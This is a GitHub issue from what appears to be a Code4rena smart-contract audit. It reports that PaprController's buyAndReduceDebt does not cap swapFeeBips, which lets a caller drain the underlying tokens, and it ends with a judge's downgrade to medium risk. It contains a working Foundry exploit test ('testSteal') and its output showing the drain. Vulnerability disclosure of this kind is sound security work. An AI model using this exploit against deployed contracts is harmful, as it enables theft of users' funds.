Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Attacker can empty the underlying tokens from the PaprController. #174

Closed
code423n4 opened this issue Dec 21, 2022 · 5 comments
Closed

Attacker can empty the underlying tokens from the PaprController. #174

code423n4 opened this issue Dec 21, 2022 · 5 comments
Labels
2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value bug Something isn't working downgraded by judge Judge downgraded the risk level of this issue duplicate-196 edited-by-warden partial-50 Incomplete articulation of vulnerability; eligible for partial credit only (50%)

Comments

@code423n4
Copy link
Contributor

code423n4 commented Dec 21, 2022
edited

Lines of code

https://github.com/with-backed/papr/blob/9528f2711ff0c1522076b9f93fba13f88d5bd5e6/src/PaprController.sol#L226

Vulnerability details

The bug exists in the buyAndReduceDebt function.

function buyAndReduceDebt(address account, ERC721 collateralAsset, IPaprController.SwapParams calldata params)
        external
        override
        returns (uint256)
    {
        bool hasFee = params.swapFeeBips != 0;

        (uint256 amountOut, uint256 amountIn) = UniswapHelpers.swap(
            pool,
            account,
            token0IsUnderlying,
            params.amount,
            params.minOut,
            params.sqrtPriceLimitX96,
            abi.encode(msg.sender)
        );

        if (hasFee) {
            underlying.transfer(params.swapFeeTo, amountIn * params.swapFeeBips / BIPS_ONE);
        }

        _reduceDebt({account: account, asset: collateralAsset, burnFrom: msg.sender, amount: amountOut});

        return amountOut;
    }

The expected value params.swapFeeBips should be ≤ BIPS_ONE.

Here the params.swapFeeBips value is not checked to be less than or equal to BIPS_ONE . An attacker can set the value of params.swapFeeBips to be very high and params.swapFeeTo to be their own address. It is possible to set these values such that the attacker transfers nearly all the underlying tokens to themselves in a transaction.

POC

A quick POC in foundry :

  • Change the original BuyAndReduceDebt.t.sol to the code below.
  • forge test --match-contract BuyAndReduceDebt -vvv
// SPDX-License-Identifier: GPL-2.0-or-later
pragma solidity ^0.8.17;

import {TickMath} from "fullrange/libraries/TickMath.sol";

import {BasePaprControllerTest} from "./BasePaprController.ft.sol";
import {IPaprController} from "../../src/interfaces/IPaprController.sol";
import {PaprController} from "../../src/PaprController.sol";
import {UniswapHelpers} from "../../src/libraries/UniswapHelpers.sol";
import "../../src/ReservoirOracleUnderwriter.sol";

contract BuyAndReduceDebt is BasePaprControllerTest {
    function testSteal() public {
        //assume that any point in time the balance of controller is 4000e18 underlying tokens.
        underlying.mint(address(controller), 4000e18 );
        
        vm.startPrank(borrower);
        nft.approve(address(controller), collateralId);
        IPaprController.Collateral[] memory c = new IPaprController.Collateral[](1);
        c[0] = collateral;
        controller.addCollateral(c);
        IPaprController.SwapParams memory swapParams = IPaprController.SwapParams({
            amount: debt,
            minOut: 982507,
            sqrtPriceLimitX96: _maxSqrtPriceLimit({sellingPAPR: true}),
            swapFeeTo: address(0),
            swapFeeBips: 0
        });
        uint256 underlyingOut = controller.increaseDebtAndSell(borrower, collateral.addr, swapParams, oracleInfo);
        underlying.approve(address(controller), underlyingOut);
        uint160 priceLimit = _maxSqrtPriceLimit({sellingPAPR: false});
        uint256 out = quoter.quoteExactInputSingle({
            tokenIn: address(underlying),
            tokenOut: address(controller.papr()),
            fee: 10000,
            amountIn: underlyingOut,
            sqrtPriceLimitX96: priceLimit
        });
        swapParams = IPaprController.SwapParams({
            amount: underlyingOut,
            minOut: out - 1000,
            sqrtPriceLimitX96: priceLimit,
            swapFeeTo: address(borrower),
            swapFeeBips: 40e18
        });
        controller.buyAndReduceDebt(borrower, collateral.addr, swapParams);
        uint256 max_debt = controller.maxDebt(controller.underwritePriceForCollateral(nft, ReservoirOracleUnderwriter.PriceKind.LOWER, oracleInfo));
        emit log_named_decimal_uint("Max borrow power of borrower/attacker",max_debt,18);
        emit log_named_decimal_uint( "Underlying balance of borrower/attacker" , underlying.balanceOf(borrower), 18);
        emit log_named_decimal_uint( "PAPR balance of borrower/attacker" , controller.papr().balanceOf(borrower), 18);
    }
}

Output:

[PASS] testSteal() (gas: 521323)
Logs:
  Max borrow power of borrower/attacker: 1.500000000000000000
  Underlying balance of borrower/attacker: 3930.028000000000000000
  PAPR balance of borrower/attacker: 0.000000000000000000

Test result: ok. 1 passed; 0 failed; finished in 1.74s

Impact

The attacker was able to steal almost all the underlying tokens from the contract.

Recommendations

Add a check in buyAndReduceDebt function:

require(params.swapFeeBips <= BIPS_ONE);
@code423n4 code423n4 added 3 (High Risk) Assets can be stolen/lost/compromised directly bug Something isn't working labels Dec 21, 2022
code423n4 added a commit that referenced this issue Dec 21, 2022
@code423n4
fs0c issue #174
e45279d
@c4-judge
Copy link
Contributor

trust1995 marked the issue as duplicate of #20

@c4-judge
Copy link
Contributor

trust1995 marked the issue as partial-50

@c4-judge c4-judge added the partial-50 Incomplete articulation of vulnerability; eligible for partial credit only (50%) label Dec 25, 2022
@trust1995
Copy link

50% for not identifying there should not be underlying value in the contract.

@c4-judge c4-judge added 2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value downgraded by judge Judge downgraded the risk level of this issue and removed 3 (High Risk) Assets can be stolen/lost/compromised directly labels Dec 25, 2022
@c4-judge
Copy link
Contributor

trust1995 changed the severity to 2 (Med Risk)

C4-Staff added a commit that referenced this issue Jan 6, 2023
@C4-Staff
original risk added for issue #174
fd9e38a
@C4-Staff
Copy link
Contributor

JeeberC4 marked the issue as duplicate of #196

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value bug Something isn't working downgraded by judge Judge downgraded the risk level of this issue duplicate-196 edited-by-warden partial-50 Incomplete articulation of vulnerability; eligible for partial credit only (50%)
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@trust1995 @code423n4 @c4-judge @C4-Staff